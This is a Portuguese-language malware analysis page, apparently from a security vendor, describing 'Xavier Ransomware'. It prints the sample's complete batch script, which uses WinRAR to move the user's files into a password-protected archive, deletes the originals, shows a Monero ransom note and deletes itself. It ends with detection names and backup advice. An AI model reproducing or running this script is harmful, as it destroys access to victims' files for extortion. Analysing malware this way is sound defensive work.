Xavier Ransomware
O Xavier Ransomware é um Trojan não padronizado que foi colocado sob a classe de ameaças cibernéticas. O Xavier Ransomware foi adicionado aos bancos de dados de AV em 5 de janeiro de 2019 e pode ser entregue aos usuários através de anúncios corrompidos, e-mails de spam, documentos habilitados para macro e atualizações falsas para a fonte usada no seu navegador da Web. O que é interessante sobre o Xavier Ransomware é que ele é carregado não como um programa, mas como um script BATCH. Essa técnica tem sido utilizada por um número muito pequeno de agentes de ameaça no passado devido às suas limitações e a falta de possibilidades de ofuscação do código. No entanto, o Xavier Ransomware se assemelha ao RarVault Ransomware pela sua capacidade de iniciar softwares legítimos e usá-los para fins nefastos.
Como mencionado acima, o Xavier Ransomware é embalado como um script BACH que os pesquisadores coletaram como 'Encoder.bat' de uma plataforma de segurança. O script do 'Encoder.bat' revelou que os seus autores confiam no software WinRAR da win.rar GmbH. para ser instalado nos sistemas comprometidos para que o ataque tenha sucesso. Existem muitas outras ameaças cibernéticas que utilizam aplicativos legítimos e limpos para facilitar os ataques aos usuários, mas o Xavier Ransomware, surpreendentemente, funciona de uma forma muito simples. O Xavier Ransomware é executado em dez linhas de código que criam um arquivo protegido por senha com os dados do usuário e uma breve mensagem de resgate na tela do usuário. O código inteiro para o Xavier Ransomware pode ser encontrado abaixo:
@echo off
set filename="LOCK.rar"
set commentsfile=info.txt
set pass="xavier"
set comment="Files Blocked! CONTACT: SENT 0.3 XMR TO 0x0050d76893de9E045fbaBCDb6A58dC714BDd"
msg * %comments%
"%PROGRAMFILES%\WinRAR\Rar.exe" a -r -y -ri15 -df -m0 -inul -p%pass% %filename%
echo %comments% >> %commentsfile%
"%PROGRAMFILES%\WinRAR\Rar.exe" c %filename% -z%commentsfile%
del %0
Por favor, note que você não deve salvá-lo e executá-lo no seu PC se você tiver instalado o programa WinRAR e não quiser excluir arquivos do seu computador. O Xavier Ransomware foi projetado para criar um cofre chamado 'LOCK.rar' na unidade do sistema e colocar todos os documentos encontrados dentro da pasta base do usuário. O Trojan é nomeado de acordo com a senha encontrada nas amostras - 'xavier', que é usada para 'LOCK.rar'. O Xavier Ransomware grava um arquivo chamado 'Info.txt' na pasta Temp e o carrega na tela quando o conteúdo do usuário é colocado no cofre de arquivos. 'Info.txt' exibe o seguinte — 'Files Blocked! CONTACT: SENT 0.3 XMR TO 0x0050d76893de9E045fbaBCDb6A58dC714BDd' e direciona os usuários para pagar 0.3 XMR (≈15USD/13 EUR) em um endereço de carteira.
O Xavier Ransomware não foi distribuído amplamente e não é percebido como uma ameaça significativa aos usuários, mas ele pode evoluir. É melhor fazer backups regularmente e evitar propagandas questionáveis nos sites que você visita. Os nomes de detecção para o Xavier Ransomware incluem:
BAT/LockFiles.C!tr.ransom
Packed/MPress
Ransom_Blobash.R002C0DLI18
TR/Ransom.zakdj
Trojan ( 00491e9a1 )
Trojan.BAT.LockFiles
Trojan.GenericKD.40845728
Trojan.GenericKD.Win32.235951
Unsafe.AI_Score_88%
W32.OnGamesLTMYAMIAU.Trojan
W32/A-6d15c8bc!Eldorado
